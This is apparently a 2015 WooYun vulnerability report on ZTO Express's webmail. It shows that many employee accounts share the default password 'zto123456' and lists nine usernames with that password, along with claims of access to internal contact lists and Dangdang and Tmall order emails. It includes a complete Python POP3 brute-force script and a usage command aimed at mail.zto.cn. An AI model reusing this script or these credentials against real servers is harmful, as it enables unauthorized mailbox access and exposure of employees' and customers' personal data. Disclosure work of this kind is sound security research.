当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156014

漏洞标题:快递安全之中通速递邮箱系统多账号信息泄漏(涉及内部通讯录\当当、天猫等订单信息\附验证脚本)

相关厂商:中通速递

漏洞作者: harbour_bin

提交时间:2015-11-26 11:15

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-26: 细节已通知厂商并且等待厂商处理中
2015-11-26: 厂商已经确认,细节仅向厂商公开
2015-12-06: 细节向核心白帽子及相关领域专家公开
2015-12-16: 细节向普通白帽子公开
2015-12-26: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT

详细说明:

1、

URL:http://mail.zto.cn/index.php


[+] Login successful: zhouyanan zto123456
        [+] Mail: 18882 emails
[+] Login successful: wangfang zto123456
        [+] Mail: 212 emails
[+] Login successful: liyong zto123456
        [+] Mail: 9 emails
[+] Login successful: liuting zto123456
        [+] Mail: 44 emails
[+] Login successful: xiaoqian zto123456
        [+] Mail: 16 emails
[+] Login successful: qiuline zto123456
        [+] Mail: 109 emails
[+] Login successful: liping zto123456
        [+] Mail: 957 emails
[+] Login successful: yeqing zto123456
        [+] Mail: 273 emails
[+] Login successful: wangbin zto123456
        [+] Mail: 205 emails
[-] Done


总结: zto123456应该是默认口令
2、登录邮箱, 证明一下危害
近2万封与当当、天猫的往来信息

zto.png


内部通讯录

zto1.png


每天订单

zto3.png


zto4.png


其他敏感信息

zto2.png


zto5.png


可进一步收集数据, 进行邮箱测试

漏洞证明:

已证明
测试代码, 可用于内部测试

#!usr/bin/python 
#!coding:utf-8 
import sys,poplib 
if len(sys.argv) !=4 and len(sys.argv) != 5: 
    print "\t    Note: 邮箱类型为:中通 \n" 
    print "\t    Note: 用户字典不需要域名后缀,例如zhangsan\n" 
    print "\t    Usage: 使用方法:./mail.py type <userlist> <wordlist> mail.domain.com\n"   
    sys.exit(1) 
server = sys.argv[4]
success = [] 
try: 
    users_list = open(sys.argv[2], "r") 
    users = users_list.readlines() 
    words_list = open(sys.argv[3], "r") 
    words = words_list.readlines() 
except(IOError): 
    print "[-] Error: please check filename\n" 
    sys.exit(1) 
finally: 
    users_list.close() 
    words_list.close()
     
try: 
    pop = poplib.POP3_SSL(server,995) 
    welcome = pop.getwelcome() 
    print welcome 
    pop.quit() 
except (poplib.error_proto): 
    welcome = "[-] Error: No Response,Something wrong!!!\n" 
    sys.exit(1) 
print "[+] Server:",server 
print "[+] Users Loaded:",len(users) 
print "[+] Words Loaded:",len(words) 
print "[+] Server response:",welcome,"\n" 
def mailbruteforce(listuser,listpwd,type): 
    if len(listuser) < 1 or len(listpwd) < 1 : 
        print "[-] Error: An error occurred: No user or pass list\n" 
        return 1 
     
    for user in listuser: 
        for passwd in listpwd : 
            user = user.replace("\n","") 
            passwd = passwd.replace("\n","") 
             
            try: 
                print "-"*12 
                print "[+] User:",user,"Password:",passwd 
                
                #time.sleep(0.5)       
                popserver = poplib.POP3_SSL(server,995) 
                popserver.user(user) 
                auth = popserver.pass_(passwd)
                print auth
                if auth.split(' ')[0] == "+OK" or auth =="+OK": 
                    ret = (user,passwd,popserver.stat()[0],popserver.stat()[1]) 
                    success.append(ret) 
                    print len(success) 
                    popserver.quit() 
                    break 
                else : 
                    popserver.quit() 
                    continue 
             
            except: 
                #print "An error occurred:", msg 
                pass 
if __name__ == '__main__': 
    mailbruteforce(users,words,sys.argv[1]) 
     
    print "\t[+] have weakpass :\t",len(success) 
    if len(success) >=1: 
        for ret in success: 
            print "\n\n[+] Login successful:",ret[0], ret[1] 
            print "\t[+] Mail:",ret[2],"emails" 
    print "\n[-] Done"


useage:

D:\Python>python mail\zto.py Winmail mail\zto.txt mail\pass\pass0.txt mail.zto.cn


代码有些地方不是很完美, 但可以用的

修复方案:

你们更专业!
PS:SSO也有点有问题, 如果能扩大危害, 再提交吧...

版权声明:转载请注明来源 harbour_bin@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-11-26 11:53

厂商回复:

感谢白帽子的辛苦劳动,已经联系负责人处理。麻烦下次对联系方式等进行脱敏,谢谢。

最新状态:

暂无